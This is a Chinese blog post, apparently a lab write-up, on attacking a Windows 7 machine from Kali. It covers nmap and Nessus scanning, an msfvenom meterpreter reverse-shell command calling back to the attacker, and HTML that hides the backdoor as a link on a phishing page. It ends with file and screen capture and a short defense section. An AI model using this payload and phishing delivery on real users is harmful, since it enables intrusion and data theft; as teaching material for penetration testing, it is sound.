• 安全渗透测试-win7


    安全渗透测试-win7-后门利用

    环境说明:

    攻击机:kali

    靶机:windows7x64

    靶机开放服务:Apache2.4.39、MySQL5.7.26

    信息收集

    采用工具:nmap、nessus

    (1)执行ifconfig命令,查看本机IP地址为:192.168.2.65。采用nmap的ping扫描,扫描当前网络C段,查看存活的主机。
    在这里插入图片描述
    (2)使用nmap的SYN扫描,查询C段地址30-70的主机,找到开放80端口的windows主机,即为目标主机IP:192.168.2.60。
    在这里插入图片描述
    (3)查询目标主机的操作系统为Windows 7|2008|8.1
    在这里插入图片描述
    (4)用nessus查询目标主机的漏洞,如图所示:
    在这里插入图片描述

    渗透测试:

    通过nessus找到目标系统的80端口开放并存在漏洞,准备利用该漏洞进行攻击。
    (1)通过msfvenom生成后门木马并指定木马回弹的ip地址为kali攻击机,端口指定为4567端口:如图中shell.exe
    终端输入:
    : msfvenom -p windows/meterpreter_reverse_tcp LHOST={xxx.xxx.xxx.xxx} LPORT={xxxx} -e x86/shikata_ga_nai -f exe -o new.exe -i 5

    在这里插入图片描述
    (2)制作一个简单的静态钓鱼网站,并在网站中隐藏植入刚刚生成的shell文件。ps:不会写前端的宝贝也无所谓,网上随便找
    一个html的静态页面代码就可以,然后在代码中插入:

        <li class="nav-item">
    	<a class="nav-link" href="./shell.exe">标题任取</a>
    	</li>
    
    • 1
    • 2
    • 3

    在这里插入图片描述
    在kali中通过python开启简单web服务。PS:端口被占用开启失败的可以换一个端口
    在这里插入图片描述
    (3)在靶机中访问目标网站,并点击链接。
    在这里插入图片描述
    在靶机中下载shell文件:PS:靶机中防火墙等可能会自动清除,注意分辨
    在这里插入图片描述
    (4)在kali攻击机中开启msf,并使用handler监听模式:
    在这里插入图片描述
    设置lhost与lport与shell中设置的一样:
    输入run命令,开始执行,并等待靶机上线:
    在这里插入图片描述
    (5) 在靶机中点击shell文件,回弹到kali,成功建立会话 ,在kali中使用dir、cat等命令成功获取指定文件:
    在这里插入图片描述
    在kali中截取靶机屏幕截图:
    在这里插入图片描述

    过程分析:

    如图所示:在建立靶机执行shell文件时,建立TCP会话,回传ACK帧,通过三次握手,建立TCP链接:
    在这里插入图片描述
    在kali中输入dir命令,可以看到有TCP协议抓包,回传PSH帧,表明双方有数据传输:
    在这里插入图片描述
    在这里插入图片描述
    在kali中执行quit命令,退出监听,可见回传FIN帧,表示链接关闭,回传RST帧,表示链接重置:
    在这里插入图片描述

    靶机防御:

    (1)在靶机中找到后台运行的shell.exe结束进程,则攻击机中会话将被关闭:
    在这里插入图片描述
    在这里插入图片描述
    (2)打开防火墙后,在点击钓下载链接时,防火墙会自动处理下载的后门病毒,则不会给攻击者可乘之机,所以作为靶机用户还是要提高警惕心理,不要随便点击下载链接,有可疑文件一定要合理辨别。

  • 相关阅读:
    P2444 [POI2000] 病毒
    SpringCloud原理-OpenFeign篇(二、OpenFeign包扫描和FeignClient的注册原理)
    《动手学深度学习 Pytorch版》 7.3 网络中的网络(NiN)
    选择适合你的编程语言
    phoenix安装
    MMdetection训练配置
    SparkSql批量插入或更新,保存数据到Mysql中
    服务器内存总量和内存条有差异是什么问题 103.239.244.X
    数据链路层:差错检测
    【数一】【概率论与数理统计】
  • 原文地址:https://blog.csdn.net/liuguangshibei/article/details/125439156